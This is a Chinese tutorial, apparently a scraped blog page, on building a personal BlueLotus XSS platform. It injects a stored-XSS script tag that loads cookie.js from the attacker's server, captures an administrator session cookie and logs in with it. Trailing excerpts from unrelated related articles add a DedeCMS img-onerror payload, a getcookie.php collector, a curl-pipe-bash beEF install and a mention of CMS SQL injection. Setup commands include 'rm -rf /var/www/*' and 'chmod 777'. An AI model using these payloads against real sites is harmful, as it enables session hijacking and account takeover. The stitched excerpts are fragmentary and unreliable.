构造个人轻量级XSS平台获取管理员cookie并登录

一、前言

本平台是个人轻量级XSS测试平台,仅作为练习参考。

二、实验环境

服务器操作系统:Centos 6.6

Web容器:Apache

三、平台搭建过程

安装Apache

安装PHP

安装Git工具

从GitHub克隆XSS平台源码

删除默认网站内容

rm  -rf  /var/www/*

创建新的网站目录

mkdir  /var/www/xss

从GitHub克隆xss测试源码(https://github.com/firesunCN/BlueLotus_XSSReceiver.git)

git  clone  https://github.com/firesunCN/BlueLotus_XSSReceiver.git  /var/www/xss/

授权

chmod  -R  777  /var/www/xss/

配置Apache

允许使用 .htaccess文件

在文件末尾加上

Include  /etc/httpd/conf/vhost/httpd-vhosts.conf

开机启动Apache服务

chkconfig  httpd  on

重新加载Apache配置文件

service  httpd  reload

安装XSS平台

访问服务器ip地址,点击安装

主要修改后台登录密码和数据加密密码,其余保持默认,然后提交

安装成功,点击登录

成功登录

功能测试

点击我的JS,插入模板,选择Defualt.js,修改网站服务器ip地址

http://192.168.75.129/index.php

生成payload

<script src="http://192.168.75.129/myjs/cookie.js"></script>

成功获取用户cookie

ASPSESSIONIDCQBSTQBB=BHILNFDBLNPBDMOBFPHNOFBJ

利用Google浏览器插件edit this cookie修改cookie登录

到此存储型xss注入获取管理员cookie并登录已经圆满完成。

原文地址:https://www.cnblogs.com/panisme/p/8445071.html

时间: 2024-08-17 00:55:15

构造个人轻量级XSS平台获取管理员cookie并登录的相关文章

从零开始搭建轻量级个人XSS平台

一. 前言 决定搭建XSS平台是因为自己想深入学习一下XSS相关的知识,多多进行实践,上网搜索了一下XSS平台有很多,但是总觉得不是很安全,这个毕竟敏感信息要传输到陌生人的服务器上,而且服务器端测试代码存在不可控性,所以决定自行搭建XSS平台做学习之用.在搭建完成后和我的导师徐松进行了交流,发现这款XSS平台除了在GitHub上有作者专业化的说明外,在网上没有任何关于这款XSS平台搭建方面的教程,最后在导师的鼓励和帮助下促成了这篇分享,也顺便记录一下自己所出现的问题方便以后回顾. 1.  什么是

dedecms会员中心存储型xss可射管理员 -中国寒龙- WWW.HACKERSCHINA.ORG

这个xss需要开启会员模块(想想光整出来的时候,意气风发的去看dede官网……)xss的位置为会员中心发布文章的地方然后选择文章->发表之后在详细内容中插入代码 <img src="1" onerror="alert(1)">然后查看文章即可可能到这有人会问,尼玛说好的打管理员呢?别着急……因为xss代码只能放在onerror等里面,然后我一直没找到办法获得cookie,然后就翻js手册翻着翻着有了想法……插入如下代码:<img src=&q

利用VBA+OO4O构造CTAIS开放式通用平台

利用VBA+OO4O构造CTAIS开放式通用平台2010-06-08 14:59:28 | 来源:税务信息化论文集 | 作者:于非 易飞 摘  要:文立足于CTAIS系统体系,探讨如何通过OO4O技术和VBA技术搭建ORACLE前端开放式通用平台,同时以通过最低编程技术满足基层信息化建设的要求,从而实现CTAIS功能的扩展.本文提供的通用平台建设通过笔者精简的满足OO4O连接必需的ORACLE免安装客户端,通过EXCEL的VBA接口,采取用户编写的各类查询语句的方式查询综合征管软件分发服务器数据

i春秋xss平台

点开是个普普通通的登录窗口,没有注册,只有登录,抓住包也没获取什么有用的信息,看了看dalao的wp才知道怎么做,首先抓包然后修改参数的定义来让其报错,pass原本的应该为整数,pass[]=就可以让其定义成数组变量,造成报错 爆出一条文件路径 直接访问试试 什么鬼....看来没什么东西 找到关键字rtiny 上github搜一下 联想题目是xss平台,可能有关,点进去看看 有许许多多的py文件 一一查看就会发现在lock.py中就会有sql注入的点 不过其username是经过函数self.g

搭建简易xss平台

这两天在看xss的东西,学习了如何搭建xss平台,在这里做个记录吧. 首先进入到原先虚拟机里搭建好的dvwa网站测试平台,开启low安全模式后就来搞一搞xss了 在网址后面加上<script>alert(1)</script>,回车后弹窗说明存在xss漏洞 得知存在漏洞后我们可以利用自己搭建的平台来盗取cookie值(首先是搭好自己的网站啦,PHPstudy.wamp什么的都行) 在网站根目录下创建一个getcookie.php文档,写入如下代码 <?php //cookie

CentOS安装beEF做XSS平台

提到xss平台,大部分人都在用xsser.me的源码搭建,xsser.me源码搭建的平台虽然好用,但是功能不够强大,比如无法和Metasploit配合使用进行更深一步的入侵测试. 这次部署邮件服务器大致分为3个步骤: 安装GEM 安装配置beEF 测试 >>安装GEM 步骤 1 » 安装rvm.导入key curl -sSL https://rvm.io/mpapis.asc | gpg2 --import 安装rvm curl -L get.rvm.io | bash -s stable 启

浅谈 php 采用curl 函数库获取网页 cookie 和 带着cookie去访问 网页的方法!!!!

由于近段时间帮朋友开发一个能够查询正方教务系统的微信公众平台号.有所收获.这里总结下个人经验. 开讲前,先吐槽一下新浪云服务器,一个程序里的   同一个函数  在PC测试可以正常运行,在它那里就会挂的现象. 老样子,我将在代码里注释清楚.使用下面的函数,将会获得两种形式的 cookie,一种保存在文件中,一种直接以变量的形式返回, 经验提示: 有时候,在不同的代码运行环境中,带着文件cookie 去访问会成功,而变量却失败,有时候却想法.不过, 目前,这两种方法总有一种会成功. 1 functi

XSS平台搭建

简介: 在实施xss攻击的时候,需要有一个平台用来收集攻击获得猎物(cookie,用户名密码等):xss平台就是这样一个用于收取cookie,账号等信息的平台:可以使用外网的xss平台来测试外网的网站:也可以自己在本地搭建xss平台,测试本地搭建的web网站DVWA的漏洞 试验中,使用的xss平台是xsser 直接创建项目:在网站有xss的地方插入项目中的代码,执行的时候会把对应的信息发送到平台上.具体看平台上的说明. 基础认证钓鱼模块:插入xss后,用户访问的时候会弹出一个登陆框,用于输入用户

CMS网站漏洞检测对获取管理员密码漏洞如何修复

PbootCMS是网站常用的一款CMS系统,是由国内著名程序开发商翔云科技研发的一套网站CMS系统,免费开源,扩展性较高,使用的企业很多但是避免不了网站存在漏洞,SINE安全对其代码进行安全审计的同时发现该pbootcms 存在严重的漏洞,包含SQL注入获取管理员密码漏洞,以及远程代码注入执行漏洞.该pbootcms系统采用的是PHP语言开发,数据库是MYSQL,并支持pgsql数据库大并发处理,系统默认支持的服务器环境,PHP5.3版本以上,以及mysql版本5.6,apache,nginx,